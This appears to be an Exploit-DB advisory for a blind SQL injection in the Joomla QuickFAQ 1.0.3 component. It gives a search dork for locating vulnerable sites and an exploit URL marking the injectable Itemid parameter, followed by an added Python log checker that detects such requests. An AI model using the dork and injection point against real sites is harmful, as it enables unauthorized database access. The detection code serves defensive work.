Joomla! Component QuickFAQ 1.0.3 – Blind SQL Injection

  • Author: RoAd_KiLlEr
    Date: 2010-07-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14296/
  • -----------------------------------------------------------------------------------------
     Joomla Component (com_quickfaq) BSQL-i Vulnerability
    -----------------------------------------------------------------------------------------
    [+] Title: Joomla Component (com_quickfaq) BSQL-i Vulnerability
    [+] Author: **RoAd_KiLlEr**
    [+] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
    [+] Tested on Win Xp Sp 2/3
    ---------------------------------------------------------------------------
    [~] Founded by **RoAd_KiLlEr**
    [~] Team: Albanian Hacking Crew
    [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
    [~] Home: http://inj3ct0r.com
    [~] Vendor: http://www.schlu.net
    [~] Download Application: http://www.schlu.net/downloads/16-component/77-quickfaq.html
    [~] Version: 1.0.3
    ==========ExPl0iT3d by **RoAd_KiLlEr**==========
    
    [+]Description:
    QuickFAQ is an easy to use but powerful FAQ management system.
    
    Feature List:
    * Unlimited Subcategories
    * Assign FAQ Items to multiple Categories
    * Create Tags/Labels to flag FAQ Items
    * Up/down voting of FAQ Items
    * Favour FAQ Items to maintain a personal bookmark list
    * Document uploader/manager
    * PDF creation of FAQ Items
    * RTL support
    * RSS/ATOM Feeds
    * Detailed statistics
    * JComments and JomComments integration
    =========================================
    
    [+] Dork: inurl:"com_quickfaq"
    
    ==========================================
    
    
    [+].SQL-i Vulnerability
    =+=+=+=+=+=+=+=+=+
    
    [Exploit]:http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection]
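
    Added example, not part of the original advisory or the component's code: a log check that flags com_quickfaq requests whose cid or Itemid value is not a plain ID, which is where the injection point above sits. It assumes combined-format access logs, an integer-only Itemid, and a cid that may carry a Joomla-style ":alias" suffix; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Allowlist per parameter from the advisory's URL. Assumption: Itemid is a
# plain integer and cid is an integer with an optional Joomla ":alias" slug.
ALLOWED = {
    "cid": re.compile(r"[0-9]+(?::[A-Za-z0-9_-]+)?"),
    "Itemid": re.compile(r"[0-9]+"),
}

def suspicious_params(line):
    """Return [(param, decoded_value)] for com_quickfaq requests whose
    cid/Itemid values fall outside the allowlist."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = parse_qs(urlsplit(m.group(1)).query)  # URL-decodes the values
    if "com_quickfaq" not in query.get("option", []):
        return []
    return [(name, value)
            for name, pattern in ALLOWED.items()
            for value in query.get(name, [])  # repeated params are all checked
            if not pattern.fullmatch(value)]

def scan(lines):
    """Return [(line_number, hits)] for every flagged line (1-based)."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        hits = suspicious_params(line)
        if hits:
            flagged.append((number, hits))
    return flagged

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jul/2010:10:00:00 +0000] "GET /index.php?option=com_quickfaq&view=category&cid=3&Itemid=12 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [09/Jul/2010:10:00:05 +0000] "GET /index.php?option=com_quickfaq&view=category&cid=3&Itemid=12%20CONSTRUCTED-NON-NUMERIC HTTP/1.1" 200 5120',
    '192.0.2.12 - - [09/Jul/2010:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=7&Itemid=abc HTTP/1.1" 200 900',
    '192.0.2.13 - - [09/Jul/2010:10:00:12 +0000] "GET /index.php?option=com_quickfaq&view=category&cid=3:general&Itemid=12 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

    The same integer allowlist, applied to Itemid and cid before they reach a query, is the corresponding input check on the application side.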